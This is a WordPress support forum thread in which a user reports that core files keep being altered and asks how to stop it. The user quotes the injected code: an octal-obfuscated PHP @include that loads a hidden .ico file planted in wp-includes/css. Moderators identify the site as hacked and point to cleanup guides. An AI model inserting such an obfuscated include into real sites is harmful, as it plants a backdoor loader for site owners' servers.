Suspicious code

  • Resolved designer13421321

    (@nistuj817)


    6 years ago

    Just about every day, I get alerts on core WordPress files being modified in such a way. Random text like this: @include “\057/hom\145/cle\141rbel\151efs7\057publ\151c_ht\155l/wp\055incl\165des/\143ss/.\070a14b\07061.i\143o”;
    is inserted into the index.php, wp-config, and wp-settings.php files. Also some files like wp-includes/css/.8a14b861.ico are generated. I go through every day and restore these files back to normal, but it KEEPS HAPPENING. It’s so annoying and I need to prevent this once and for all.

    Wordfence says: The infection type is: Suspicious:PHP/obfuicoinclude
    Description: Suspicious code often added by attackers

    I’ve gotten all plugins and themes up to date, and even added define(‘DISALLOW_FILE_EDIT’, true); in the wp-config file. Help!

    The page I need help with: [log in to see the link]

Viewing 5 replies - 1 through 5 (of 5 total)
  • Moderator t-p

    (@t-p)

    Carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    • This reply was modified 6 years ago by t-p.
    • This reply was modified 6 years ago by t-p.
    Thread Starter designer13421321

    (@nistuj817)

    That’s what notifies me of the alerts to begin with. Well, it’s not sending me email notifications anymore, but when looking into the scans it’s telling me about the file changes and stuff. It’s not preventing anything though, why I need. I need to stop this.

    Moderator t-p

    (@t-p)

    Are you referring to wordfence plugin?

    If so, I recommend asking at https://www.ads-software.com/support/plugin/wordfence so the plugin’s developers and support community can help you with this.

    Moderator Steven Stern (sterndata)

    (@sterndata)

    Volunteer Forum Moderator

    You’ve been hacked.

    Get a fresh cup of coffee, take a deep breath and carefully follow this guide. When you’re done, you may want to implement some (if not all) of the recommended security measures.

    If you’re unable to clean your site(s) successfully, there are reputable organizations that can clean your sites for you. Sucuri and Wordfence are a couple.

    Thread Starter designer13421321

    (@nistuj817)

    Did those yesterday and scans have since been coming back cleanr

Viewing 5 replies - 1 through 5 (of 5 total)
  • The topic ‘Suspicious code’ is closed to new replies.